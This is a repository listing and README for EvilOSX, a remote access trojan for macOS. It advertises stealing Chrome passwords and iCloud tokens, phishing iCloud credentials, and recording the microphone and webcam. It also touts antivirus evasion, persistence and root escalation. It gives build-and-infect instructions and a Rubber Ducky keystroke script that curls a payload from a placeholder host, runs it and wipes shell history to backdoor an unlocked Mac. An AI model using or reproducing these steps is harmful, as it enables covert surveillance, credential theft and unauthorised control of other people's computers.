An evil RAT (Remote Administration Tool) for macOS / OS X.
Last updated Jul 4, 2026
2.4k
Stars
486
Forks
45
Issues
+2
Stars/day
Attention Score
51
Language breakdown
Python 99.9%
Dockerfile 0.1%
โธ Files
click to expand
README
EvilOSX
An evil RAT (Remote Administration Tool) for macOS / OS X.
Marco Generator by Cedric Owens
This project is no longer active
Features
- Emulate a terminal instance
- Simple extendable module system
- No bot dependencies (pure python)
- Undetected by anti-virus (OpenSSL AES-256 encrypted payloads)
- Persistent
- GUI and CLI support
- Retrieve Chrome passwords
- Retrieve iCloud tokens and contacts
- Retrieve/monitor the clipboard
- Retrieve browser history (Chrome and Safari)
- Phish for iCloud passwords via iTunes
- iTunes (iOS) backup enumeration
- Record the microphone
- Take a desktop screenshot or picture using the webcam
- Attempt to get root via local privilege escalation
How To Use
# Clone or download this repository
$ git clone https://github.com/Marten4n6/EvilOSX
Go into the repository
$ cd EvilOSX
Install dependencies required by the server
$ sudo pip install -r requirements.txt
Start the GUI
$ python start.py
Lastly, run a built launcher on your target(s)
Warning: Because payloads are created unique to the target system (automatically by the server), the server must be running when any bot connects for the first time.
Advanced users
There's also a CLI for those who want to use this over SSH:
# Create a launcher to infect your target(s) $ python start.py --builder
Start the CLI
$ python start.py --cli --port 1337
Lastly, run a built launcher on your target(s)
Screenshots

Motivation
This project was created to be used with my Rubber Ducky, here's the simple script:REM Download and execute EvilOSX @ https://github.com/Marten4n6/EvilOSX
REM See also: https://ducktoolkit.com/vidpid/
DELAY 1000 GUI SPACE DELAY 500 STRING Termina DELAY 1000 ENTER DELAY 1500
REM Kill all terminals after x seconds STRING screen -dm bash -c 'sleep 6; killall Terminal' ENTER
STRING cd /tmp; curl -s HOSTTOEVILOSX.py -o 1337.py; python 1337.py; history -cw; clear ENTER
- It takes about 10 seconds to backdoor any unlocked Mac, which is...... nice
- Terminal is spelt that way intentionally, on some systems spotlight won't find the terminal otherwise.
- To bypass the keyboard setup assistant make sure you change the VID&PID which can be found here.
Versioning
EvilOSX will be maintained under the Semantic Versioning guidelines as much as possible.Server and bot releases will be numbered with the follow format:
<major>.<minor>.<patch>
And constructed with the following guidelines:
- Breaking backward compatibility (with older bots) bumps the major
- New additions without breaking backward compatibility bumps the minor
- Bug fixes and misc changes bump the patch
Design Notes
- Infecting a machine is split up into three parts:
- The server hides it's communications by sending messages hidden in HTTP 404 error pages (from BlackHat's "Hiding In Plain Sight")
- Modules take advantage of python's dynamic nature, they are simply sent over the network compressed with zlib, along with any configuration options
- Since the bot only communicates with the server and never the other way around, the server has no way of knowing when a bot goes offline
Issues
Feel free to submit any issues or feature requests here.Contributing
For a simple guide on how to create modules click here.Credits
- The awesome Empire project
- Shoutout to Patrick Wardle for his awesome talks, check out Objective-See
- manwhoami for his projects: OSXChromeDecrypt, MMeTokenDecrypt, iCloudContacts
- The slowloris module is pretty much copied from PySlowLoris
- urwid and this code which saved me a lot of time with the CLI
- Logo created by motusora
License
GPLv3๐ More in this category